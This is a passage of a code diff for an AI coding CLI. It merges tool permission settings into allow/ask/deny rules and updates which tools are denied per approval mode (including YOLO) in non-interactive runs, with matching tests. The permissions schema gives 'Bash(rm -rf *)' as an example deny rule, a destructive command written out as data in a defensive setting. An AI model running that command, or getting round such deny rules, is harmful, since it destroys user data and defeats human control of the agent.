=> { const settings: Settings = {}; const config = await loadCliConfig(settings, argv, undefined, []); - const excludedTools = config.getExcludeTools(); + const excludedTools = config.getPermissionsDeny(); expect(excludedTools).toContain(ShellTool.Name); expect(excludedTools).toContain(EditTool.Name); expect(excludedTools).toContain(WriteFileTool.Name); @@ -1067,7 +1106,7 @@ describe('Approval mode tool exclusion logic', () => { const config = await loadCliConfig(settings, argv, undefined, []); - const excludedTools = config.getExcludeTools(); + const excludedTools = config.getPermissionsDeny(); expect(excludedTools).toContain(ShellTool.Name); expect(excludedTools).toContain(EditTool.Name); expect(excludedTools).toContain(WriteFileTool.Name); @@ -1084,7 +1123,7 @@ describe('Approval mode tool exclusion logic', () => { const config = await loadCliConfig(settings, argv, undefined, []); - const excludedTools = config.getExcludeTools(); + const excludedTools = config.getPermissionsDeny(); expect(excludedTools).not.toContain(ShellTool.Name); expect(excludedTools).toContain(EditTool.Name); expect(excludedTools).toContain(WriteFileTool.Name); @@ -1101,7 +1140,7 @@ describe('Approval mode tool exclusion logic', () => { const config = await loadCliConfig(settings, argv, undefined, []); - const excludedTools = config.getExcludeTools(); + const excludedTools = config.getPermissionsDeny(); expect(excludedTools).not.toContain(ShellTool.Name); expect(excludedTools).toContain(EditTool.Name); expect(excludedTools).toContain(WriteFileTool.Name); @@ -1121,7 +1160,7 @@ describe('Approval mode tool exclusion logic', () => { const config = await loadCliConfig(settings, argv, undefined, []); - const excludedTools = config.getExcludeTools(); + const excludedTools = config.getPermissionsDeny(); expect(excludedTools).toContain(ShellTool.Name); expect(excludedTools).not.toContain(EditTool.Name); expect(excludedTools).not.toContain(WriteFileTool.Name); @@ -1141,7 +1180,7 @@ describe('Approval mode tool exclusion logic', () => { const config = await loadCliConfig(settings, argv, undefined, []); - const excludedTools = config.getExcludeTools(); + const excludedTools = config.getPermissionsDeny(); expect(excludedTools).not.toContain(ShellTool.Name); expect(excludedTools).not.toContain(EditTool.Name); expect(excludedTools).not.toContain(WriteFileTool.Name); @@ -1154,7 +1193,7 @@ describe('Approval mode tool exclusion logic', () => { const config = await loadCliConfig(settings, argv, undefined, []); - const excludedTools = config.getExcludeTools(); + const excludedTools = config.getPermissionsDeny(); expect(excludedTools).not.toContain(ShellTool.Name); expect(excludedTools).not.toContain(EditTool.Name); expect(excludedTools).not.toContain(WriteFileTool.Name); @@ -1179,7 +1218,7 @@ describe('Approval mode tool exclusion logic', () => { const config = await loadCliConfig(settings, argv, undefined, []); - const excludedTools = config.getExcludeTools(); + const excludedTools = config.getPermissionsDeny(); expect(excludedTools).not.toContain(ShellTool.Name); expect(excludedTools).not.toContain(EditTool.Name); expect(excludedTools).not.toContain(WriteFileTool.Name); @@ -1199,7 +1238,7 @@ describe('Approval mode tool exclusion logic', () => { const settings: Settings = { tools: { exclude: ['custom_tool'] } }; const config = await loadCliConfig(settings, argv, undefined, []); - const excludedTools = config.getExcludeTools(); + const excludedTools = config.getPermissionsDeny(); expect(excludedTools).toContain('custom_tool'); // From settings expect(excludedTools).toContain(ShellTool.Name); // From approval mode expect(excludedTools).not.toContain(EditTool.Name); // Should be allowed in auto-edit @@ -1795,9 +1834,9 @@ describe('loadCliConfig tool exclusions', () => { process.argv = ['node', 'script.js']; const argv = await parseArguments(); const config = await loadCliConfig({}, argv, undefined, []); - expect(config.getExcludeTools()).not.toContain('run_shell_command'); - expect(config.getExcludeTools()).not.toContain('replace'); - expect(config.getExcludeTools()).not.toContain('write_file'); + expect(config.getPermissionsDeny()).not.toContain('run_shell_command'); + expect(config.getPermissionsDeny()).not.toContain('replace'); + expect(config.getPermissionsDeny()).not.toContain('write_file'); }); it('should not exclude interactive tools in interactive mode with YOLO', async () => { @@ -1805,9 +1844,9 @@ describe('loadCliConfig tool exclusions', () => { process.argv = ['node', 'script.js', '--yolo']; const argv = await parseArguments(); const config = await loadCliConfig({}, argv, undefined, []); - expect(config.getExcludeTools()).not.toContain('run_shell_command'); - expect(config.getExcludeTools()).not.toContain('replace'); - expect(config.getExcludeTools()).not.toContain('write_file'); + expect(config.getPermissionsDeny()).not.toContain('run_shell_command'); + expect(config.getPermissionsDeny()).not.toContain('replace'); + expect(config.getPermissionsDeny()).not.toContain('write_file'); }); it('should exclude interactive tools in non-interactive mode without YOLO', async () => { @@ -1815,9 +1854,9 @@ describe('loadCliConfig tool exclusions', () => { process.argv = ['node', 'script.js', '-p', 'test']; const argv = await parseArguments(); const config = await loadCliConfig({}, argv, undefined, []); - expect(config.getExcludeTools()).toContain('run_shell_command'); - expect(config.getExcludeTools()).toContain('edit'); - expect(config.getExcludeTools()).toContain('write_file'); + expect(config.getPermissionsDeny()).toContain('run_shell_command'); + expect(config.getPermissionsDeny()).toContain('edit'); + expect(config.getPermissionsDeny()).toContain('write_file'); }); it('should not exclude interactive tools in non-interactive mode with YOLO', async () => { @@ -1825,9 +1864,9 @@ describe('loadCliConfig tool exclusions', () => { process.argv = ['node', 'script.js', '-p', 'test', '--yolo']; const argv = await parseArguments(); const config = await loadCliConfig({}, argv, undefined, []); - expect(config.getExcludeTools()).not.toContain('run_shell_command'); - expect(config.getExcludeTools()).not.toContain('replace'); - expect(config.getExcludeTools()).not.toContain('write_file'); + expect(config.getPermissionsDeny()).not.toContain('run_shell_command'); + expect(config.getPermissionsDeny()).not.toContain('replace'); + expect(config.getPermissionsDeny()).not.toContain('write_file'); }); }); diff --git a/packages/cli/src/config/config.ts b/packages/cli/src/config/config.ts index 88153fe75..d1b8fbf86 100755 --- a/packages/cli/src/config/config.ts +++ b/packages/cli/src/config/config.ts @@ -10,7 +10,6 @@ import { Config, DEFAULT_QWEN_EMBEDDING_MODEL, FileDiscoveryService, - FileEncoding, getAllGeminiMdFilenames, loadServerHierarchicalMemory, setGeminiMdFilename as setServerGeminiMdFilename, @@ -19,7 +18,6 @@ import { Storage, InputFormat, OutputFormat, - isToolEnabled, SessionService, ideContextStore, type ResumedSessionData, @@ -31,10 +29,13 @@ import { NativeLspClient, createDebugLogger, NativeLspService, + isToolEnabled, } from '@qwen-code/qwen-code-core'; import { extensionsCommand } from '../commands/extensions.js'; import { hooksCommand } from '../commands/hooks.js'; -import type { Settings } from './settings.js'; +import type { Settings, LoadedSettings } from './settings.js'; +import { SettingScope } from './settings.js'; +import { authCommand } from '../commands/auth.js'; import { resolveCliGenerationConfig, getAuthTypeFromEnv, @@ -52,16 +53,16 @@ import { appEvents } from '../utils/events.js'; import { mcpCommand } from '../commands/mcp.js'; // UUID v4 regex pattern for validation -const UUID_REGEX = - /^[0-9a-f]{8}-[0-9a-f]{4}-[1-5][0-9a-f]{3}-[89ab][0-9a-f]{3}-[0-9a-f]{12}$/i; +const SESSION_ID_REGEX = + /^[0-9a-f]{8}-[0-9a-f]{4}-[1-5][0-9a-f]{3}-[89ab][0-9a-f]{3}-[0-9a-f]{12}(-agent-[a-zA-Z0-9_.-]+)?$/i; /** - * Validates if a string is a valid UUID format - * @param value - The string to validate - * @returns True if the string is a valid UUID, false otherwise + * Validates if a string is a valid session ID format. + * Accepts a standard UUID, or a UUID followed by `-agent-{suffix}` + * (used by Arena to give each agent a deterministic session ID). */ -function isValidUUID(value: string): boolean { - return UUID_REGEX.test(value); +function isValidSessionId(value: string): boolean { + return SESSION_ID_REGEX.test(value); } import { isWorkspaceTrusted } from './trustedFolders.js'; @@ -111,6 +112,8 @@ export interface CliArgs { debug: boolean | undefined; prompt: string | undefined; promptInteractive: string | undefined; + systemPrompt: string | undefined; + appendSystemPrompt: string | undefined; yolo: boolean | undefined; approvalMode: string | undefined; telemetry: boolean | undefined; @@ -290,6 +293,16 @@ export async function parseArguments(): Promise { description: 'Execute the provided prompt and continue in interactive mode', }) + .option('system-prompt', { + type: 'string', + description: + 'Override the main session system prompt for this run. Can be combined with --append-system-prompt.', + }) + .option('append-system-prompt', { + type: 'string', + description: + 'Append instructions to the main session system prompt for this run. Can be combined with --system-prompt.', + }) .option('sandbox', { alias: 's', type: 'boolean', @@ -386,6 +399,7 @@ export async function parseArguments(): Promise { description: 'List all available extensions and exit.', }) .option('include-directories', { + alias: 'add-dir', type: 'array', string: true, description: @@ -557,10 +571,13 @@ export async function parseArguments(): Promise { if (argv['sessionId'] && (argv['continue'] || argv['resume'])) { return 'Cannot use --session-id with --continue or --resume. Use --session-id to start a new session with a specific ID, or use --continue/--resume to resume an existing session.'; } - if (argv['sessionId'] && !isValidUUID(argv['sessionId'] as string)) { + if ( + argv['sessionId'] && + !isValidSessionId(argv['sessionId'] as string) + ) { return `Invalid --session-id: "${argv['sessionId']}". Must be a valid UUID (e.g., "123e4567-e89b-12d3-a456-426614174000").`; } - if (argv['resume'] && !isValidUUID(argv['resume'] as string)) { + if (argv['resume'] && !isValidSessionId(argv['resume'] as string)) { return `Invalid --resume: "${argv['resume']}". Must be a valid UUID (e.g., "123e4567-e89b-12d3-a456-426614174000").`; } return true; @@ -570,6 +587,8 @@ export async function parseArguments(): Promise { .command(mcpCommand) // Register Extension subcommands .command(extensionsCommand) + // Register Auth subcommands + .command(authCommand) // Register Hooks subcommands .command(hooksCommand); @@ -685,6 +704,7 @@ export async function loadCliConfig( argv: CliArgs, cwd: string = process.cwd(), overrideExtensions?: string[], + loadedSettings?: LoadedSettings, ): Promise { const debugMode = isDebugMode(argv); @@ -814,64 +834,106 @@ export async function loadCliConfig( // (fallback for edge cases where query/prompt is provided with TEXT output) interactive = false; } - // In non-interactive mode, exclude tools that require a prompt. - // However, if stream-json input is used, control can be requested via JSON messages, - // so tools should not be excluded in that case. - const extraExcludes: string[] = []; - const resolvedCoreTools = argv.coreTools || settings.tools?.core || []; - const resolvedAllowedTools = - argv.allowedTools || settings.tools?.allowed || []; - const isExplicitlyEnabled = (toolName: ToolName): boolean => { - if (resolvedCoreTools.length > 0) { - if (isToolEnabled(toolName, resolvedCoreTools, [])) { - return true; - } + // ── Unified permissions construction ───────────────────────────────────── + // All permission sources are merged here, before constructing Config. + // The resulting three arrays are the single source of truth that Config / + // PermissionManager will use. + // + // Sources (in order of precedence within each list): + // 1. settings.permissions.{allow,ask,deny} (persistent, merged by LoadedSettings) + // 2. argv.coreTools → allow (allowlist mode: only these tools are available) + // 3. argv.allowedTools → allow (auto-approve these tools/commands) + // 4. argv.excludeTools → deny (block these tools completely) + // 5. Non-interactive mode exclusions → deny (unless explicitly allowed above) + + // Start from settings-level rules. + // Read from both new `permissions` and legacy `tools` paths for compatibility. + // Note: settings.tools.core / argv.coreTools are intentionally NOT merged into + // mergedAllow — they have whitelist semantics (only listed tools are registered), + // not auto-approve semantics. They are passed via the `coreTools` Config param + // and handled by PermissionManager.coreToolsAllowList. + const resolvedCoreTools: string[] = [ + ...(argv.coreTools ?? []), + ...(settings.tools?.core ?? []), + ]; + const mergedAllow: string[] = [ + ...(settings.permissions?.allow ?? []), + ...(settings.tools?.allowed ?? []), + ]; + const mergedAsk: string[] = [...(settings.permissions?.ask ?? [])]; + const mergedDeny: string[] = [ + ...(settings.permissions?.deny ?? []), + ...(settings.tools?.exclude ?? []), + ]; + + // argv.allowedTools adds allow rules (auto-approve). + for (const t of argv.allowedTools ?? []) { + if (t && !mergedAllow.includes(t)) mergedAllow.push(t); + } + + // argv.excludeTools adds deny rules. + for (const t of argv.excludeTools ?? []) { + if (t && !mergedDeny.includes(t)) mergedDeny.push(t); + } + + // Helper: check if a tool is explicitly covered by an allow rule OR by the + // coreTools whitelist. Uses alias matching for coreTools (via isToolEnabled) + // to preserve the original behaviour where "ShellTool", "Shell", and + // "run_shell_command" are all accepted as the same tool. + const isExplicitlyAllowed = (toolName: ToolName): boolean => { + const name = toolName as string; + // 1. Check permissions.allow / allowedTools rules. + if ( + mergedAllow.some((rule) => { + const openParen = rule.indexOf('('); + const ruleName = + openParen === -1 ? rule.trim() : rule.substring(0, openParen).trim(); + return ruleName === name; + }) + ) { + return true; } - if (resolvedAllowedTools.length > 0) { - if (isToolEnabled(toolName, resolvedAllowedTools, [])) { - return true; - } + // 2. Check coreTools whitelist (with alias matching). + // If coreTools is non-empty and explicitly includes this tool, it is + // considered allowed for non-interactive mode exclusion purposes. + if (resolvedCoreTools.length > 0) { + return isToolEnabled(toolName, resolvedCoreTools, []); } return false; }; - const excludeUnlessExplicit = (toolName: ToolName): void => { - if (!isExplicitlyEnabled(toolName)) { - extraExcludes.push(toolName); - } - }; - // ACP mode check: must include both --acp (current) and --experimental-acp (deprecated). - // Without this check, edit, write_file, run_shell_command would be excluded in ACP mode. + // In non-interactive mode, tools that require a user prompt are denied unless + // the caller has explicitly allowed them. Stream-JSON input is excluded from + // this logic because approval can be sent programmatically via JSON messages. const isAcpMode = argv.acp || argv.experimentalAcp; if (!interactive && !isAcpMode && inputFormat !== InputFormat.STREAM_JSON) { + const denyUnlessAllowed = (toolName: ToolName): void => { + if (!isExplicitlyAllowed(toolName)) { + const name = toolName as string; + if (!mergedDeny.includes(name)) mergedDeny.push(name); + } + }; + switch (approvalMode) { case ApprovalMode.PLAN: case ApprovalMode.DEFAULT: - // In default non-interactive mode, all tools that require approval are excluded, - // unless explicitly enabled via coreTools/allowedTools. - excludeUnlessExplicit(ShellTool.Name as ToolName); - excludeUnlessExplicit(EditTool.Name as ToolName); - excludeUnlessExplicit(WriteFileTool.Name as ToolName); + // Deny all write/execute tools unless explicitly allowed. + denyUnlessAllowed(ShellTool.Name as ToolName); + denyUnlessAllowed(EditTool.Name as ToolName); + denyUnlessAllowed(WriteFileTool.Name as ToolName); break; case ApprovalMode.AUTO_EDIT: - // In auto-edit non-interactive mode, only tools that still require a prompt are excluded. - excludeUnlessExplicit(ShellTool.Name as ToolName); + // Only shell requires a prompt in auto-edit mode. + denyUnlessAllowed(ShellTool.Name as ToolName); break; case ApprovalMode.YOLO: - // No extra excludes for YOLO mode. + // No extra denials for YOLO mode. break; default: - // This should never happen due to validation earlier, but satisfies the linter break; } } - const excludeTools = mergeExcludeTools( - settings, - extraExcludes.length > 0 ? extraExcludes : undefined, - argv.excludeTools, - ); - let allowedMcpServers: Set | undefined; let excludedMcpServers: Set | undefined; if (argv.allowedMcpServerNames) { @@ -962,9 +1024,33 @@ export async function loadCliConfig( importFormat: settings.context?.importFormat || 'tree', debugMode, question, + systemPrompt: argv.systemPrompt, + appendSystemPrompt: argv.appendSystemPrompt, + // Legacy fields – kept for backward compatibility with getCoreTools() etc. coreTools: argv.coreTools || settings.tools?.core || undefined, allowedTools: argv.allowedTools || settings.tools?.allowed || undefined, - excludeTools, + excludeTools: mergedDeny, + // New unified permissions (PermissionManager source of truth). + permissions: { + allow: mergedAllow.length > 0 ? mergedAllow : undefined, + ask: mergedAsk.length > 0 ? mergedAsk : undefined, + deny: mergedDeny.length > 0 ? mergedDeny : undefined, + }, + // Permission rule persistence callback (writes to settings files). + onPersistPermissionRule: loadedSettings + ? async (scope, ruleType, rule) => { + const settingScope = + scope === 'project' ? SettingScope.Workspace : SettingScope.User; + const key = `permissions.${ruleType}`; + const currentRules: string[] = + loadedSettings.forScope(settingScope).settings.permissions?.[ + ruleType + ] ?? []; + if (!currentRules.includes(rule)) { + loadedSettings.setValue(settingScope, key, [...currentRules, rule]); + } + } + : undefined, toolDiscoveryCommand: settings.tools?.discoveryCommand, toolCallCommand: settings.tools?.callCommand, mcpServerCommand: settings.mcp?.serverCommand, @@ -1013,7 +1099,6 @@ export async function loadCliConfig( warnings: resolvedCliConfig.warnings, cliVersion: await getCliVersion(), webSearch: buildWebSearchConfig(argv, settings, selectedAuthType), - summarizeToolOutput: settings.model?.summarizeToolOutput, ideMode, chatCompression: settings.model?.chatCompression, folderTrust, @@ -1027,7 +1112,6 @@ export async function loadCliConfig( skipStartupContext: settings.model?.skipStartupContext ?? false, truncateToolOutputThreshold: settings.tools?.truncateToolOutputThreshold, truncateToolOutputLines: settings.tools?.truncateToolOutputLines, - enableToolOutputTruncation: settings.tools?.enableToolOutputTruncation, eventEmitter: appEvents, gitCoAuthor: settings.general?.gitCoAuthor, output: { @@ -1043,11 +1127,22 @@ export async function loadCliConfig( // always be true and the settings file can never disable recording. chatRecording: argv.chatRecording ?? settings.general?.chatRecording ?? true, - defaultFileEncoding: - settings.general?.defaultFileEncoding ?? FileEncoding.UTF8, + defaultFileEncoding: settings.general?.defaultFileEncoding, lsp: { enabled: lspEnabled, }, + agents: settings.agents + ? { + displayMode: settings.agents.displayMode, + arena: settings.agents.arena + ? { + worktreeBaseDir: settings.agents.arena.worktreeBaseDir, + preserveArtifacts: + settings.agents.arena.preserveArtifacts ?? false, + } + : undefined, + } + : undefined, }); if (lspEnabled) { @@ -1074,16 +1169,3 @@ export async function loadCliConfig( return config; } - -function mergeExcludeTools( - settings: Settings, - extraExcludes?: string[] | undefined, - cliExcludeTools?: string[] | undefined, -): string[] { - const allExcludeTools = new Set([ - ...(cliExcludeTools || []), - ...(settings.tools?.exclude || []), - ...(extraExcludes || []), - ]); - return [...allExcludeTools]; -} diff --git a/packages/cli/src/config/migration/versions/v1-to-v2-shared.ts b/packages/cli/src/config/migration/versions/v1-to-v2-shared.ts index c87fa4480..c63979f35 100644 --- a/packages/cli/src/config/migration/versions/v1-to-v2-shared.ts +++ b/packages/cli/src/config/migration/versions/v1-to-v2-shared.ts @@ -55,7 +55,6 @@ export const V1_TO_V2_MIGRATION_MAP: Record = { shellPager: 'tools.shell.pager', shellShowColor: 'tools.shell.showColor', skipNextSpeakerCheck: 'model.skipNextSpeakerCheck', - summarizeToolOutput: 'model.summarizeToolOutput', telemetry: 'telemetry', theme: 'ui.theme', toolDiscoveryCommand: 'tools.discoveryCommand', @@ -157,7 +156,6 @@ export const V1_INDICATOR_KEYS = [ 'shellPager', 'shellShowColor', 'skipNextSpeakerCheck', - 'summarizeToolOutput', 'toolDiscoveryCommand', 'toolCallCommand', 'usageStatisticsEnabled', diff --git a/packages/cli/src/config/settings.ts b/packages/cli/src/config/settings.ts index 0809cf090..d1d64f1c8 100644 --- a/packages/cli/src/config/settings.ts +++ b/packages/cli/src/config/settings.ts @@ -67,6 +67,74 @@ export const DEFAULT_EXCLUDED_ENV_VARS = ['DEBUG', 'DEBUG_MODE']; export const SETTINGS_VERSION = 3; export const SETTINGS_VERSION_KEY = '$version'; +/** + * Migrate legacy tool permission settings (tools.core / tools.allowed / tools.exclude) + * to the new permissions.allow / permissions.ask / permissions.deny format. + * + * Conversion rules: + * tools.allowed → permissions.allow (bypass confirmation) + * tools.exclude → permissions.deny (block tools) + * tools.core → permissions.allow (only listed tools enabled) + * + permissions.deny with a wildcard deny-all if needed + * + * Returns the updated settings object, or null if no migration is needed. + */ +export function migrateLegacyPermissions( + settings: Record, +): Record | null { + const tools = settings['tools'] as Record | undefined; + if (!tools) return null; + + const hasLegacy = + Array.isArray(tools['core']) || + Array.isArray(tools['allowed']) || + Array.isArray(tools['exclude']); + + if (!hasLegacy) return null; + + const result = structuredClone(settings) as Record; + const resultTools = result['tools'] as Record; + const permissions = (result['permissions'] as Record) ?? {}; + result['permissions'] = permissions; + + const mergeInto = (key: string, items: string[]) => { + const existing = Array.isArray(permissions[key]) + ? (permissions[key] as string[]) + : []; + const merged = Array.from(new Set([...existing, ...items])); + permissions[key] = merged; + }; + + // tools.allowed → permissions.allow + if (Array.isArray(resultTools['allowed'])) { + mergeInto('allow', resultTools['allowed'] as string[]); + delete resultTools['allowed']; + } + + // tools.exclude → permissions.deny + if (Array.isArray(resultTools['exclude'])) { + mergeInto('deny', resultTools['exclude'] as string[]); + delete resultTools['exclude']; + } + + // tools.core → permissions.allow (explicit enables) + // IMPORTANT: tools.core has whitelist semantics: "only these tools can run". + // To preserve this, we also add deny rules for all tools NOT in the list. + // A wildcard deny-all followed by specific allows achieves this because + // allow rules take precedence over the catch-all deny in the evaluation order: + // deny = [everything not listed], allow = [listed tools] + // However, since our priority is deny > allow, we cannot use a blanket deny. + // Instead we just migrate to allow (auto-approve) and let the coreTools + // semantics continue to work through the Config.getCoreTools() path until + // the old API is fully removed. + if (Array.isArray(resultTools['core'])) { + mergeInto('allow', resultTools['core'] as string[]); + delete resultTools['core']; + } + + return result; +} + export function getSystemSettingsPath(): string { if (process.env['QWEN_CODE_SYSTEM_SETTINGS_PATH']) { return process.env['QWEN_CODE_SYSTEM_SETTINGS_PATH']; @@ -103,10 +171,6 @@ export interface CheckpointingSettings { enabled?: boolean; } -export interface SummarizeToolOutputSettings { - tokenBudget?: number; -} - export interface AccessibilitySettings { enableLoadingPhrases?: boolean; screenReader?: boolean; diff --git a/packages/cli/src/config/settingsSchema.test.ts b/packages/cli/src/config/settingsSchema.test.ts index cfde449ca..c4ad800e2 100644 --- a/packages/cli/src/config/settingsSchema.test.ts +++ b/packages/cli/src/config/settingsSchema.test.ts @@ -181,9 +181,7 @@ describe('SettingsSchema', () => { expect(getSettingsSchema().security.properties.auth.showInDialog).toBe( false, ); - expect(getSettingsSchema().tools.properties.core.showInDialog).toBe( - false, - ); + expect(getSettingsSchema().permissions.showInDialog).toBe(false); expect(getSettingsSchema().mcpServers.showInDialog).toBe(false); expect(getSettingsSchema().telemetry.showInDialog).toBe(false); diff --git a/packages/cli/src/config/settingsSchema.ts b/packages/cli/src/config/settingsSchema.ts index 4701abc1a..c97b41f86 100644 --- a/packages/cli/src/config/settingsSchema.ts +++ b/packages/cli/src/config/settingsSchema.ts @@ -76,12 +76,98 @@ export interface SettingDefinition { mergeStrategy?: MergeStrategy; /** Enum type options */ options?: readonly SettingEnumOption[]; + /** Schema for array items when type is 'array' */ + items?: SettingItemDefinition; +} + +/** + * Schema definition for array item types. + * Supports simple types (string, number, boolean) and complex object types. + */ +export interface SettingItemDefinition { + type: 'string' | 'number' | 'boolean' | 'object' | 'array'; + properties?: Record< + string, + SettingItemDefinition & { + required?: boolean; + enum?: string[]; + additionalProperties?: SettingItemDefinition; + } + >; + items?: SettingItemDefinition; + required?: boolean; + enum?: string[]; + description?: string; + additionalProperties?: boolean | SettingItemDefinition; } export interface SettingsSchema { [key: string]: SettingDefinition; } +/** + * Common items schema for hook definitions. + * Used by both UserPromptSubmit and Stop hooks. + */ +const HOOK_DEFINITION_ITEMS: SettingItemDefinition = { + type: 'object', + description: + 'A hook definition with an optional matcher and a list of hook configurations.', + properties: { + matcher: { + type: 'string', + description: + 'An optional matcher pattern to filter when this hook definition applies.', + }, + sequential: { + type: 'boolean', + description: + 'Whether the hooks should be executed sequentially instead of in parallel.', + }, + hooks: { + type: 'array', + description: 'The list of hook configurations to execute.', + required: true, + items: { + type: 'object', + description: + 'A hook configuration entry that defines a command to execute.', + properties: { + type: { + type: 'string', + description: 'The type of hook.', + enum: ['command'], + required: true, + }, + command: { + type: 'string', + description: 'The command to execute when the hook is triggered.', + required: true, + }, + name: { + type: 'string', + description: 'An optional name for the hook.', + }, + description: { + type: 'string', + description: 'An optional description of what the hook does.', + }, + timeout: { + type: 'number', + description: 'Timeout in milliseconds for the hook execution.', + }, + env: { + type: 'object', + description: + 'Environment variables to set when executing the hook command.', + additionalProperties: { type: 'string' }, + }, + }, + }, + }, + }, +}; + export type MemoryImportFormat = 'tree' | 'flat'; export type DnsResolutionOrder = 'ipv4first' | 'verbatim'; @@ -546,17 +632,6 @@ const SETTINGS_SCHEMA = { 'Maximum number of user/model/tool turns to keep in a session. -1 means unlimited.', showInDialog: false, }, - summarizeToolOutput: { - type: 'object', - label: 'Summarize Tool Output', - category: 'Model', - requiresRestart: false, - default: undefined as - | Record - | undefined, - description: 'Settings for summarizing tool output.', - showInDialog: false, - }, chatCompression: { type: 'object', label: 'Chat Compression', @@ -789,6 +864,55 @@ const SETTINGS_SCHEMA = { }, }, + permissions: { + type: 'object', + label: 'Permissions', + category: 'Tools', + requiresRestart: true, + default: {}, + description: + 'Permission rules controlling tool usage. Rules are evaluated in priority order: deny > ask > allow.', + showInDialog: false, + properties: { + allow: { + type: 'array', + label: 'Allow Rules', + category: 'Tools', + requiresRestart: true, + default: undefined as string[] | undefined, + description: + 'Tools or commands that are auto-approved without confirmation. ' + + 'Examples: "ShellTool", "Bash(git *)", "ReadFileTool".', + showInDialog: false, + mergeStrategy: MergeStrategy.UNION, + }, + ask: { + type: 'array', + label: 'Ask Rules', + category: 'Tools', + requiresRestart: true, + default: undefined as string[] | undefined, + description: + 'Tools or commands that always require user confirmation. ' + + 'Takes precedence over allow rules.', + showInDialog: false, + mergeStrategy: MergeStrategy.UNION, + }, + deny: { + type: 'array', + label: 'Deny Rules', + category: 'Tools', + requiresRestart: true, + default: undefined as string[] | undefined, + description: + 'Tools or commands that are always blocked. Highest priority rule. ' + + 'Examples: "ShellTool", "Bash(rm -rf *)".', + showInDialog: false, + mergeStrategy: MergeStrategy.UNION, + }, + }, + }, + tools: { type: 'object', label: 'Tools', @@ -848,32 +972,33 @@ const SETTINGS_SCHEMA = { }, }, }, + // Legacy tool permission fields – kept for backward compatibility. + // Use permissions.{allow,ask,deny} instead. core: { type: 'array', - label: 'Core Tools', + label: 'Core Tools (deprecated)', category: 'Tools', requiresRestart: true, default: undefined as string[] | undefined, - description: 'Paths to core tool definitions.', + description: 'Deprecated. Use permissions.allow instead.', showInDialog: false, }, allowed: { type: 'array', - label: 'Allowed Tools', + label: 'Allowed Tools (deprecated)', category: 'Advanced', requiresRestart: true, default: undefined as string[] | undefined, - description: - 'A list of tool names that will bypass the confirmation dialog.', + description: 'Deprecated. Use permissions.allow instead.', showInDialog: false, }, exclude: { type: 'array', - label: 'Exclude Tools', + label: 'Exclude Tools (deprecated)', category: 'Tools', requiresRestart: true, default: undefined as string[] | undefined, - description: 'Tool names to exclude from discovery.', + description: 'Deprecated. Use permissions.deny instead.', showInDialog: false, mergeStrategy: MergeStrategy.UNION, }, @@ -941,15 +1066,6 @@ const SETTINGS_SCHEMA = { 'Use the bundled ripgrep binary. When set to false, the system-level "rg" command will be used instead. This setting is only effective when useRipgrep is true.', showInDialog: false, }, - enableToolOutputTruncation: { - type: 'boolean', - label: 'Enable Tool Output Truncation', - category: 'General', - requiresRestart: true, - default: true, - description: 'Enable truncation of large tool outputs.', - showInDialog: false, - }, truncateToolOutputThreshold: { type: 'number', label: 'Tool Output Truncation Threshold', @@ -1178,6 +1294,104 @@ const SETTINGS_SCHEMA = { description: 'Configuration for web search providers.', showInDialog: false, }, + agents: { + type: 'object', + label: 'Agents', + category: 'Advanced', + requiresRestart: false, + default: {}, + description: + 'Settings for multi-agent collaboration features (Arena, Team, Swarm).', + showInDialog: false, + properties: { + displayMode: { + type: 'enum', + label: 'Display Mode', + category: 'Advanced', + requiresRestart: false, + default: undefined as string | undefined, + description: + 'Display mode for multi-agent sessions. Currently only "in-process" is supported.', + showInDialog: false, + options: [ + { value: 'in-process', label: 'In-process' }, + // { value: 'tmux', label: 'tmux' }, + // { value: 'iterm2', label: 'iTerm2' }, + ], + }, + arena: { + type: 'object', + label: 'Arena', + category: 'Advanced', + requiresRestart: false, + default: {}, + description: 'Settings for Arena (multi-model competitive execution).', + showInDialog: false, + properties: { + worktreeBaseDir: { + type: 'string', + label: 'Worktree Base Directory', + category: 'Advanced', + requiresRestart: true, + default: undefined as string | undefined, + description: + 'Custom base directory for Arena worktrees. Defaults to ~/.qwen/arena.', + showInDialog: false, + }, + preserveArtifacts: { + type: 'boolean', + label: 'Preserve Arena Artifacts', + category: 'Advanced', + requiresRestart: false, + default: false, + description: + 'When enabled, Arena worktrees and session state files are preserved after the session ends or the main agent exits.', + showInDialog: true, + }, + maxRoundsPerAgent: { + type: 'number', + label: 'Max Rounds Per Agent', + category: 'Advanced', + requiresRestart: false, + default: undefined as number | undefined, + description: + 'Maximum number of rounds (turns) each agent can execute. No limit if unset.', + showInDialog: false, + }, + timeoutSeconds: { + type: 'number', + label: 'Timeout (seconds)', + category: 'Advanced', + requiresRestart: false, + default: undefined as number | undefined, + description: + 'Total timeout in seconds for the Arena session. No limit if unset.', + showInDialog: false, + }, + }, + }, + team: { + type: 'object', + label: 'Team', + category: 'Advanced', + requiresRestart: false, + default: {}, + description: + 'Settings for Agent Team (role-based collaborative execution). Reserved for future use.', + showInDialog: false, + }, + swarm: { + type: 'object', + label: 'Swarm', + category: 'Advanced', + requiresRestart: false, + default: {}, + description: + 'Settings for Agent Swarm (parallel sub-agent execution). Reserved for future use.', + showInDialog: false, + }, + }, + }, hooksConfig: { type: 'object', @@ -1233,6 +1447,7 @@ const SETTINGS_SCHEMA = { 'Hooks that execute before agent processing. Can modify prompts or inject context.', showInDialog: false, mergeStrategy: MergeStrategy.CONCAT, + items: HOOK_DEFINITION_ITEMS, }, Stop: { type: 'array', @@ -1244,9 +1459,124 @@ const SETTINGS_SCHEMA = { 'Hooks that execute after agent processing. Can post-process responses or log interactions.', showInDialog: false, mergeStrategy: MergeStrategy.CONCAT, + items: HOOK_DEFINITION_ITEMS, + }, + Notification: { + type: 'array', + label: 'Notification Hooks', + category: 'Advanced', + requiresRestart: false, + default: [], + description: 'Hooks that execute when notifications are sent.', + showInDialog: false, + mergeStrategy: MergeStrategy.CONCAT, + }, + PreToolUse: { + type: 'array', + label: 'Pre Tool Use Hooks', + category: 'Advanced', + requiresRestart: false, + default: [], + description: 'Hooks that execute before tool execution.', + showInDialog: false, + mergeStrategy: MergeStrategy.CONCAT, + }, + PostToolUse: { + type: 'array', + label: 'Post Tool Use Hooks', + category: 'Advanced', + requiresRestart: false, + default: [], + description: 'Hooks that execute after successful tool execution.', + showInDialog: false, + mergeStrategy: MergeStrategy.CONCAT, + }, + PostToolUseFailure: { + type: 'array', + label: 'Post Tool Use Failure Hooks', + category: 'Advanced', + requiresRestart: false, + default: [], + description: 'Hooks that execute when tool execution fails. ', + showInDialog: false, + mergeStrategy: MergeStrategy.CONCAT, + }, + SessionStart: { + type: 'array', + label: 'Session Start Hooks', + category: 'Advanced', + requiresRestart: false, + default: 